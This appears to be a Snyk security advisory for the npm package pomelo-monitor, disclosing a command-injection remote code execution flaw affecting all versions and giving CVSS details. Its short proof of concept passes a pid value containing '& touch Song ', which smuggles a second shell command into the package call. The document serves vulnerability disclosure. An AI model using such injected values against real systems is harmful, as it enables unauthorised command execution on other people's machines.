Remote Code Execution (RCE)

Affecting pomelo-monitor package, ALL versions

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

pomelo-monitor is a Simple, comprehensive monitoring tool for operating-system and process in nodejs.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). It is possible to inject arbitrary commands as part of pomelo-monitor params.

PoC


var root =require("pomelo-monitor");
var param ={
  pid: "& touch Song "
}

root.psmonitor.getPsInfo(param,function(){});

Remediation

There is no fixed version for pomelo-monitor.

References

CVSS Score

6.5
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N/E:P/RL:O/RC:C
Credit
JHU System Security Lab
CWE
CWE-94
Snyk ID
SNYK-JS-POMELOMONITOR-173695
Disclosed
14 Feb, 2018
Published
28 Dec, 2018